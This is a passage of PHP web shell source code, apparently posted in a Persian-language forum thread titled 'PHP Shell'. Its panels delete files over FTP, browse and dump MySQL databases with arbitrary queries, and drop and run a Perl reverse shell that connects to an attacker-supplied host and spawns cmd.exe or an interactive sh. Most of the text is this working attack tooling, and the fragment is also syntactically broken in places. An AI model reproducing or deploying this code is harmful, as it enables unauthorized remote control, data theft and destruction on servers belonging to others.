if (!$lista = ftp_nlist($enter.".")) {

echo "<script>alert('Error al cargar directorio');</script>";

creditos();

}

} else {

if (!$lista = ftp_nlist($enter,$_GET['diar'])) {

echo "<script>alert('Pass/user incorrectos.');</script>";

creditos();

}

echo "<form action='' method=POST>";

echo "<input type=hidden name=serverftp value=".$_GET['serverftp'].">

<input type=hidden name=pass value=".$_GET['pass'].">";

echo "<table>";

echo "<td class=main>Name</td><td class=main>Type</td><td class=main>Accion</td><tr>";

foreach ($lista as $ver) {

if (ftp_size($enter,ftp_pwd($enter).$ver) == -1) {

echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$ver.">$ver</a></td>";

echo "<td class=main>Directory</td>";

echo "<td><input type=checkbox name=vax[] value='".$ver."'></td>";

echo "<tr>";

} else {

echo "<td class=main>".$ver."</td>";

echo "<td class=main>File</td>";

echo "<td><input type=checkbox name=vax[] value='".$ver."'></td>";

echo "<tr>";

}

if (isset($_POST['furia'])) {

$files = $_POST['vax'];

$enter = ftp_connect($_POST['serverftp']);

$dentro = ftp_login($enter,$_POST['user'],$_POST['pass']);

foreach($files as $file) {

if (ftp_delete($enter,ftp_pwd($enter)."/".$file)) {

} else {

ftp_rmdir($enter,ftp_pwd($enter)."/".$file);

}

echo "<script>alert('Archivos borrados');</script>";

}

echo "</table>";

echo"<br><br>

Options :

<option>Eliminar</option>

</select> <input type=submit name=furia value=Ok></form>";

} else {

echo "<b>[-] Error en el servidor</b><br><br>";

}

if (isset($_GET['newdirftp'])) {

$enter = ftp_connect($_GET['serverftp']);

$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if (ftp_mkdir($enter,$_GET['diar'].$_GET['newdirftp'])) {

echo "<script>alert('Directorio creado');</script>";

echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';

} else {

echo "<script>alert('Error');</script>";

}

if (isset($_GET['backshell'])) {

echo "

<h2>BackShell</h2><br><br>

</select></td><tr></table>

</center>

</form>

";

}

if (isset($_GET['ipar'])) {

if ($_GET['tipo']=="Perl") {

$code = '

#!usr/bin/perl

#Reverse Shell 0.1

#By Veneno D

use IO::Socket;

print "\n== -- Reverse Shell 0.2 - Veneno D 2012 -- ==\n\n";

unless (@ARGV == 2) {

print "[Sintax] : $0 <host> <port>\n\n";

exit(1);

} else {

print "[+] Starting the connection\n";

print "[+] Enter in the system\n";

print "[+] Enjoy !!!\n\n";

conectar($ARGV[0],$ARGV[1]);

tipo();

}

sub conectar {

socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));

connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));

open (STDIN,">&REVERSE");

open (STDOUT,">&REVERSE");

open (STDERR,">&REVERSE");

}

sub tipo {

print "\n[*] Reverse Shell Starting...\n\n";

if ($^O =~/Win32/ig) {

infowin();

system("cmd.exe");

} else {

infolinux();

system("export TERM=xterm;exec sh -i");

}

sub infowin {

print "[+] Domain Name : ".Win32::DomainName()."\n";

print "[+] OS Version : ".Win32::GetOSName()."\n";

print "[+] Username : ".Win32::LoginName()."\n\n\n";

}

sub infolinux {

print "[+] System information\n\n";

system("uname -a");

print "\n\n";

}

# ¿ The End ?

';

echo "<center><h2>OutPut</h2></center>";

$de = $_SERVER["HTTP_USER_AGENT"];

if(eregi("Win",$de)){

if ($test = fopen("back.pl","w")) {

echo "<br><br><b><center>[+] Shell Creada</b><br>";

} else {

echo "<br><br><b>[-] Error al crear la shell</b><br>";

}

} else {

if ($test = fopen("/tmp/back.pl","w")) {

echo "<br><br><b>[+] Shell Creada</b><br>";

} else {

echo "<br><br><b>[-] Error al crear la shell</b><br>";

}

if (fwrite($test,$code)) {

if(eregi("Win",$de)){

if (chmod("back.pl",0777)) {

echo "<b>[+] Permisos cambiados<br></b>";

} else {

echo "<b>[-] No hay privilegios para cambiar permisos</b><br>";

}

echo "<b>[+] Cargando shell</b><br><br><br>";

echo "<br><BR>";

echo "<fieldset>";

if (!system("perl back.pl ".$_GET['ipar']. " ".$_GET['portar'])) {

echo "<script>alert('Error al cargar la shell');</script>";

}

echo "</fieldset>";

} else {

if (chmod("/tmp/back.pl",0777)) {

echo "<b>[+] Permisos cambiados<br></b>";

} else {

echo "<b>[-] No hay privilegios para cambiar permisos</b><br>";

}

echo "<b>[+] Cargando shell</b><br><br><br>";

echo "<br><BR>";

echo "<fieldset>";

if (!system("cd /tmp;perl back.pl ".$_GET['ipar']. " ".$_GET['portar'])) {

echo "<script>alert('Error al cargar la shell');</script>";

}

echo "</center></fieldset>";

}

} else {

echo "<br><b>[-] Error al escribir en la shell<br><br></b>";

}}

echo "<br><br>";

}

if (isset($_GET['sql'])) {

echo "

<center><h2>SQL interface</h2></center><br>

<td><b>Servidor: </b></td><td><input type=text name=host value=localhost></td><tr>

<td><b>Usuario: </b></td><td><input type=text name=usuario value=root></td><tr>

<td><b>Clave: </b></td><td><input type=text name=password value=123></td><tr>

</table>

</form></center>

";

}

if (isset($_GET['entersql'])) {

if ($mysql = @mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password'])) {

if ($databases = @mysql_list_dbs($mysql)) {

echo "<br><br><center><h2>Databases encontradas</h2><br>";

echo "<table>";

while($dat = @mysql_fetch_row($databases)) {

foreach($dat as $indice => $valor) {

echo "<td class=main>$valor</td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&enterdb=".$valor.">Entrar</a></td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&bajardb=".$valor.">Descargar</a></td><tr>";

}

echo "</table>";

} else {

echo "<script>alert('Error al cargar las bases de datos');</script>";

creditos();

}

} else {

echo "<script>alert('Error');</script>";

creditos();

}

if (isset($_GET['enterdb'])) {

$mysql = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']);

mysql_select_db($_GET['enterdb']);

echo "<center>";

$tablas = mysql_query("show tables from ".$_GET['enterdb']) or die("error");

echo "<br><h2>Tablas encontradas</h2><br><br><table>";

while ($tabla = mysql_fetch_row($tablas)) {

foreach($tabla as $indice => $valor) {

echo "<td class=main>$valor</td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&entertable=".$valor."&condb=".$_GET['enterdb'].">Entrar</a></td></td><td class=main><a href=?datear=$valor&host=".$_GET['host']."&usuario=".$_GET['usuario']."&password=".$_GET['password']."&bajartabla=".$valor."&condb=".$_GET['enterdb'].">Download</a><tr>";

}

echo "</table>";

}

if (isset($_GET['entertable'])) {

$mysql = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']);

mysql_select_db($_GET['condb']);

echo "<br><center><h2>SQL interface</h2>

<b>Consulta SQL: </b><input type=text name=sentencia size=70 value='select * from ".$_GET['datear']."'>

</form>

<br><br><br><br><br>";

$conexion = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']) or die("<h1>Error</h1>");

mysql_select_db($_GET['condb']);

if (isset($_POST['mostrar'])) {

if(!empty($_POST['sentencia'])) {

$resultado = mysql_query($_POST['sentencia']);

} else {

$resultado = mysql_query("SELECT * FROM ".$_GET['entertable']);

}

$numer = 0;

echo "<table>";

for ($i=0;$i< mysql_num_fields($resultado);$i++) {

echo "<th class=main>".mysql_field_name($resultado,$i)."</th>";

$numer++;

}

while($dat = mysql_fetch_row($resultado)) {

echo "<tr>";

foreach($dat as $val) {

echo "<td class=main>".$val."</td>";

}

echo "</tr></table>";

}

creditos();

} else {

echo "

user : <input type=text name=user><br>

pass : <input type=text name=pass><br><br>

</form>

";

}

// ¿ El fin?

?>

ورود

PHP Shell

پست های پیشنهاد شده

RoOot

لینک به دیدگاه

به اشتراک گذاری در سایت های دیگر

RoOot

لینک به دیدگاه

به اشتراک گذاری در سایت های دیگر

RoOot

لینک به دیدگاه

به اشتراک گذاری در سایت های دیگر

به گفتگو بپیوندید

فهرست‌ها

فعالیت‌ها

فروشگاه

Support